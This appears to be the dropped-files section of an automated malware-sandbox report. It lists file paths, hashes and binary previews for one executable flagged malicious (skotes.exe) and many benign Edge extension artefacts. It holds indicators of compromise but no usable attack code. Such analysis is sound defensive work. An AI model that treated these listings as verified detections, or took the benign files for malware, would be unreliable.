SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\DocumentsECAFHIIJJE.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3271168
Entropy (8bit):	6.671104203446932
Encrypted:	false
SSDEEP:	49152:iScFB5I5BoeCFO7YJbyPVavDBpbtG8Hz+L/7HndLT7Y9O:iScFEnoeCFO7YJ2PVavbtGoI7FY9O
MD5:	B4DF44B9A693D554AD3FCC4F32D5E470
SHA1:	32EA2138EBEF8CB84BFA7541398F43D86B6F3C6F
SHA-256:	8A302DCD657F4443283E5BD307EB99452FD388AC9CFB8756DB734511AE234866
SHA-512:	7081A5F5BB178B0483A5119D9A5BC6CFD2853965E996FE8A42A621237EBBC87ECBB426830E0754C2D05EFE14C6BCE8E1F2842494912C6FEB43D262BA2F79DD90
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@.......................... 2......O2...@.................................W...k...........................l.1...............................1..................................................... . ............................@....rsrc...............................@....idata ............................@...lwvftjpd.0+......0+.................@...ppdaehht......1.......1.............@....taggant.0....1.."....1.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\c397cfa7-4e59-49ce-b9b9-c6e3f633cda4.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1529200
Entropy (8bit):	7.992021747839123
Encrypted:	true
SSDEEP:	24576:VCqgbVYrsTzLDrj3/rEtMI98AFs3wgBFvsCf5k4wHtpyemlfWVuLegIF9C0fDDq5:VCHpYrezH/3/aMFAFab0CfKQpWVQeLFy
MD5:	0A6C624253F75B7D4948BB1F2B2F3F60
SHA1:	407E62DE3D5151776698BDD224E15CD0F9045343
SHA-256:	34422B6A2ECB9F301086E777E73F656B561D28D47990405DE835DEA525A5649D
SHA-512:	7A79B817AC03A60E6A096559E4ECD0008A54BCB86C4E9E76545A66AEB95DEA8A1736F262A3C5948B56002072C5DD02B74245FA945C5820B58F7E01F5E040641D
Malicious:	false
Preview:	.PNG........IHDR... ... .....szz.....bKGD............./IDATX..W}l.E..3..w.+..H.\|...D.%..M.Z5.I..&.Q....W.%.P..!.&.Q.."..0...H.Z.".....>Z....A.......m.....1..........{...A........<.-a.27j..... '.A.D...kVI.B..A...}..o:/...h<..E....M2r.0.PP<j.j..e]..>lh.(..?u.....KqB.7CP..8.D.a.$.%..??.iG.=+.~..2FH...\am;}...n......h~.H...........#KvW..w;.#.dc..1.JW.2...(...nu.Q0....,..H0..1)..[....^.P..r..;.`{.d........%...6.......@.."O.+"&zSym.,.Nn..L..pj.&K.Z.....yH=..R.P?.i..Td...Sb.%o.....w..R`.sOJIjQ.>...i.v....A.CD\|bfx....).o.g.....I....6...!....<.t\|"....PO<".:/+..>1.......R.o...@.../"y.",S.@...B..h...Z...P.>.......+...:z........7,:.....\|)C.p.H+`i..e).8...zA".$:Z.o.........j]].....K:.....ZI.. ....~..&........:]...w.md./zkT.Z..F........,."7\|.\|u..3....G.../7.oJ...*...7..~l......PY.HQ>..`$........2.{.....>( I,...h..I...N.y}=..VN.R.....IH..kp.V..\|Io.+k...Eb.ES>.E2......Z.._.I .q0..0.......F.&D.(D1.Q+.M...!z9.....#xV.p....nH....7....\t.w"`F...-

C:\Users\user\AppData\Local\Temp\c55bdb05-bb73-4d1a-8b66-b650802270b1.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41900
Category:	dropped
Size (bytes):	76321
Entropy (8bit):	7.996057445951542
Encrypted:	true
SSDEEP:	1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iys3BBrYunau6wpGzxue:GdS8scZNzFrMa4M+lK5/nXexue
MD5:	D7A1AC56ED4F4D17DD0524C88892C56D
SHA1:	4153CA1A9A4FD0F781ECD5BA9D2A1E68C760ECD4
SHA-256:	0A29576C4002D863B0C5AE7A0B36C0BBEB0FB9AFD16B008451D4142C07E1FF2B
SHA-512:	31503F2F6831070E887EA104296E17EE755BB6BBFB1EF2A15371534BFA2D3F0CD53862389625CF498754B071885A53E1A7F82A3546275DB1F4588E0E80BF7BEE
Malicious:	false
Preview:	...........m{..(.}...7.\...N.D.w..m..q....%XfL.I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'..."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g..^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D\|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.

C:\Users\user\AppData\Local\Temp\cv_debug.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2110
Entropy (8bit):	5.409409163636842
Encrypted:	false
SSDEEP:	48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854RrT:8e2Fa116uCntc5toY2O2M
MD5:	23E3EFF17CC086A7F36EE36FE0D59CC7
SHA1:	B7516A38AB6B8CC7B40AFE6622B5076752FDBAAB
SHA-256:	A83F4B87058BD9863B1C1FE1018505BBA4ABE1AAB8F0AF8F75DDAF82AA4BF1E4
SHA-512:	19300FEA1E4C1F08BAA267FAA2DD0CD4790DD0AFF077B1392EA524808A44E89C22E650C7491BA7B361C4EC398C42E00A88C705F57329D08ABE160EDF001B810F
Malicious:	false
Preview:	{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647

C:\Users\user\AppData\Local\Temp\e6f19098-9e12-47e0-a8e0-67834d44375e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\ff7f23e2-b1bf-4f86-8beb-198d8152e615.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
Category:	dropped
Size (bytes):	206855
Entropy (8bit):	7.983996634657522
Encrypted:	false
SSDEEP:	3072:5WcDW3D2an0GM0GqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEIO:l81Ltl7E6lEMVo/S01fDpWmEgs
MD5:	FE412FA3A2B510A55FE8496C5490BB2F
SHA1:	499667BC9FE43344D037FB95A6563AD30D3DB3D5
SHA-256:	DE6110AFBA31DC638DE84FD6D255D78C2125CEFADCE3774B310149B4EBE5EE1D
SHA-512:	3E8821A1249AA4DC88629C9D6BF6BAD0AE9074CFCACB22B3E856F05DB9DCB54A5B4A3F03D9BE94F06C79F28313C95F5E77A66543ADA180ACBE71BC824AEB47B5
Malicious:	false
Preview:	......Exif..II.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..B.P..(......................................( .................... .".... .".......(.. ."....... ....o......E.6... ....."........."J......Ah......@.@@....:@{6..wCp..3...((.(.........................@..(...."............................ ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1068565818\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1753
Entropy (8bit):	5.8889033066924155
Encrypted:	false
SSDEEP:	48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
MD5:	738E757B92939B24CDBBD0EFC2601315
SHA1:	77058CBAFA625AAFBEA867052136C11AD3332143
SHA-256:	D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
SHA-512:	DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
Malicious:	false
Preview:	[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1068565818\CRX_INSTALL\content.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
Category:	dropped
Size (bytes):	9815
Entropy (8bit):	6.1716321262973315
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
MD5:	3D20584F7F6C8EAC79E17CCA4207FB79
SHA1:	3C16DCC27AE52431C8CDD92FBAAB0341524D3092
SHA-256:	0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
SHA-512:	315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1068565818\CRX_INSTALL\content_new.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
Category:	dropped
Size (bytes):	10388
Entropy (8bit):	6.174387413738973
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
MD5:	3DE1E7D989C232FC1B58F4E32DE15D64
SHA1:	42B152EA7E7F31A964914F344543B8BF14B5F558
SHA-256:	D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
SHA-512:	177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1068565818\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.698567446030411
Encrypted:	false
SSDEEP:	24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
MD5:	E805E9E69FD6ECDCA65136957B1FB3BE
SHA1:	2356F60884130C86A45D4B232A26062C7830E622
SHA-256:	5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
SHA-512:	049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
Malicious:	false
Preview:	{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1068565818\e6f19098-9e12-47e0-a8e0-67834d44375e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\5e2aa920-8667-4386-9a03-de6ba84c799e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	135771
Entropy (8bit):	7.802585890890899
Encrypted:	false
SSDEEP:	3072:LtlntxI0jRnnf4pTz8IayMaCRABlauflM+u0F/oWRW:pl4+hf4pTky1EABYufNFS4W
MD5:	DA75BB05D10ACC967EECAAC040D3D733
SHA1:	95C08E067DF713AF8992DB113F7E9AEC84F17181
SHA-256:	33AE9B8F06DC777BB1A65A6BA6C3F2A01B25CD1AFC291426B46D1DF27EA6E7E2
SHA-512:	56533DE53872F023809A20D1EA8532CDC2260D40B05C5A7012C8E61576FF092F006A197F759C92C6B8C429EEEC4BB542073B491DDCFD5B22CD4ECBE1A8A7C6EF
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[...........=.B.../EYp....i:........ua....w...\H.j....b....4...l.b.:u.%1z....}L.A.F.IZ.2^.j...!F.&@;L..z...02..`:J_@....m....qcQ.\|sD.r`vC.#.8lm...R.8.~A...."~)".[.M...o.a.H.$..(.d/.K.6......c........#.$..>.#..3..-...n4J.$-....N...s.G...3..q.e..(.B?."...9M......[0Y0....H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...H0F.!..w./B..$<......r-.'..xp.H..Q...8.!..R^...%..W0....q....g.D..~.".%............mo.:......<#a..e...Chp...x4z....!.!.a...qgo....p8.T.6...Z....?..CV...<..K...?....k..........q=....Y^........!..K...G...m.n..Y.Y.......u.Wf...TO".?.......U/Rd..Y....j....H..Q...{.....x.OQ.~+}...L.9_.:.,E.....q.0&...I;b..H...>...9.}.B

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\128.png

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	4982
Entropy (8bit):	7.929761711048726
Encrypted:	false
SSDEEP:	96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
MD5:	913064ADAAA4C4FA2A9D011B66B33183
SHA1:	99EA751AC2597A080706C690612AEEEE43161FC1
SHA-256:	AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
SHA-512:	162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
Malicious:	false
Preview:	.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...T.P.B...*Tx...=.Q..wv.w.....\|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......\|..}./.....e..,.K.1........W.u.v. ...\.o

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\af\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	908
Entropy (8bit):	4.512512697156616
Encrypted:	false
SSDEEP:	12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
MD5:	12403EBCCE3AE8287A9E823C0256D205
SHA1:	C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
SHA-256:	B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
SHA-512:	153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7792_1763254579\CRX_INSTALL\_locales\am\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1285
Entropy (8bit):	4.702209356847184
Encrypted:	false
SSDEEP:	24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
MD5:	9721EBCE89EC51EB2BAEB4159E2E4D8C
SHA1:	58979859B28513608626B563138097DC19236F1F
SHA-256:	3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
SHA-512:	FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
Malicious:	false
